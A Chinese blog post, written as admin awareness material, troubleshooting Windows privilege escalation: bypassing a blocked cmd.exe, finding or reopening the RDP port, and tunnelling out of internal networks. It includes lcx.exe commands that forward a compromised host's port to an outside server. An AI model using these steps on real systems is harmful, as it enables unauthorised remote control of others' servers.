提權篇之exp 提權中所遇到的問題(有攻才有防)

一個不知道攻的管理員不是一個好管理員,一個知道攻,不知道防的管理員更不是一個好的管理員!!!

既知攻,又知防,通過本文,你就會知道危害,同時也知道攻擊者是如何攻擊的,你都感到這麼危害性了,你還想做個懶惰的管理員嗎?

補丁打上去!防護軟體裝上去!時時更新,時時觀察!

請對我們廣大用戶的數據做保障,要不誰會去你網站註冊信息啊!

在 exp 提權中,我們會遇到很多的問題,這裡我也按著三大類來一一記錄吧。

1,cmd 無法執行

2,3389無法連接

3,exp 執行失敗

我原本想著我在虛擬機里搭建著環境來演示一遍的,但是如果這樣的話,光一個問題演示,我就得截 N 個圖,所以我就簡單的大概的記錄下算了。

1,cmd 無法執行原因分析。

1.1,可能 cmd.exe 被刪除,一般來說我們的 cmd.exe 在 C:WINDOWSsystem32 這個文件夾下面。

一般來說,我們都是直接調用了這個 cmd.exe,如果這個被刪了,我們就無法調用了,所以cmd就執行失敗了。

解決方法:找一個可讀可寫的目錄,自己上傳個 cmd.exe ,不就行了?

1.2 , 可能 cmd.exe 這個組件被降權,,,就是許可權不再試最高的管理員許可權。

信息安全就是一個信任與不信任的過程,不信任你,你就沒許可權。

解決方法:還是以上的那個方法,找個可讀可寫的的目錄,上傳個 cmd.exe 就行了。

1.3 ,調用組件被刪除或禁用,這個組件可以說是一個關鍵,因為我們很多的 DAMA 都是調用的這些組件。

我這個網上隨便找的一個,只調用了這一個組件,有的添加了很多組件,如果這個組件無法調用,就換其他組件使用,如果組件都被刪了,那就呵呵了。(我記得好像是這個理解來著,如果有錯誤,請指正。)

1.4,這個最後一位,我肯定是留給防護軟體的,,,一般的防護軟體肯定會存在這些銘感的操作保護,我這裡沒有下載一些伺服器保護的軟體,我就沒法貼圖了。

防護軟體可不是萬能的,如果你身為管理員,不經常更新的話,你的伺服器還是會被很多人種上馬的。

2, 3389無法連接。

3389這個問題,肯定就最蛋疼的問題來了,當一些不法份子進行準備控制伺服器時,結果發現無法連接伺服器,那是不是很尷尬的事。

2.1,埠被修改,我們都知道一般的遠程連接埠是 3389 ,如果管理員把把 3389 給修改成其它埠了?

這裡我就利用埠修改工具,我們就把埠給修改了,這樣別人如果直接連接的話,不就連不上了?

解決方法:

1,PID查詢法,我們先 執行 Tasklist /svc 命令,取對應進程pid號,然後 再執行 Netstat -ano 命令,取指定pid號對應的埠開放情況,這樣我們不就知道了?

來,我們先執行第一個命令 Tasklist /svc ,來查看下 pid 號。

我們這裡知道是 628 這個號碼。

然後我們繼續執行 Netstat -ano 命令,查看下開放埠。

這裡我們就知道是 1024 這個遠程埠了,這個也就是我們剛剛修改的遠程埠。

2,埠掃描大法,我們掃開放埠不就行了?

翻了翻工具,,,沒找見一個能現用的工具,,,有個 nmap 吧,我準備等以後我專門開個文章來講解如何用,順便當成我的快捷查詢的文章,方便我快速的查詢操作符。

3,註冊表讀取法,有的 DAMA 里有這個操作。

2.2, 3389 埠被關閉 ,這個一般來說不會關閉的,因為一些管理員自己操作伺服器的時候也是利用遠程的方式操作的。

解決辦法:

這個算最簡單的了,上傳一個 bat 裡面寫個打開 3389 的代碼不就行了?

2.3,內網環境

這個算是很常見的環境,一般的伺服器都是不直接對外的,都是直接在內網的,就像你手機連著一個路由器的時候,電腦連著路由器,這就是一個內網。

繞過方法:這個目前最常見的方法,就是埠轉發了,這個利用過程,我們就需要一個外網伺服器,說是外網伺服器,也就是你電腦不是內網環境,你的電腦直接撥號上網的就不算內網。

首先 ,把埠轉發工具分別發到一個伺服器上,一個自己的外網上。

然後在 cmd 里打開埠轉發工具,並執行以下操作:

/*

外網伺服器

Lcx.exe -listen 1234 4321

監聽1234埠的流量並將其轉發至本地4321埠。

內網伺服器

lcx.exe -slave 121.43.99.73 1234 192.168.1.106 1111

將本地192.168.1.106的1111埠流量轉發至121.43.99.73的1234埠上

*/

大概的思路就是:

第一步:肉雞 將本地192.168.1.106的1111埠流量轉發至121.43.99.73的1234埠上。

第二步:外網 監聽1234埠的流量並將其轉發至本地4321埠。

第三步:外網 連接本地埠4321 即代表連接肉雞的1111埠。

這樣就能遠程連接內網了。

管理員看到這裡,是不是感覺如何弄都不安全啊?還是會被控制?那繼續往下看。。。。

2.4,防護軟體!!沒有錯!就是防護軟體!除非你有防護軟體的 0day ,或者你個人的防護軟體沒有及時更新,那你的伺服器就會被攻擊。

一些防護軟體,綁定了手機號後,如果你的伺服器被攻擊了,你還能第一時間知道,然後把呢個 IP 拉黑了去!!!!

3,exp執行失敗。

3.1,你確定你用的這個 exp 是伺服器沒打補丁的那個?

3.2,exp 的操作,你沒有按著步驟操作。

3.3,有防護軟體,直接殺了你的 exp 。。。

3.4,IP策略及計算機名驗證。

偽總結 :

這個就算完了嗎?不,還有很多了。。。。。

但是攻防的道路是互相的,但是我們都希望防守的一方勝利!

我在貼幾個其他的會遇到問題了,這個就不算是科普類的,算是一些小技巧,我也是網上收集的別人的。

這三個圖,也算概括了上面的一些內容。。。。

其他的我就不繼續貼了,因為再貼就超過我記錄這個文章的意義了。。。。

這是我的筆記本,備忘錄,但是也不能違法啊!!!!

總結:

還是上面說的那幾句話,常見的攻擊手法也就這麼幾種,小黑們的手法也就這些,你知道他們是如何攻擊了,你難道還不知道如何防守嗎?

推薦閱讀:

MS08-067漏洞原理分析及還原
PEGASUS iOS內核漏洞分析(第一部分)
2萬美金等你拿!任天堂發布3DS漏洞懸賞任務

TAG:漏洞 | 系统漏洞 |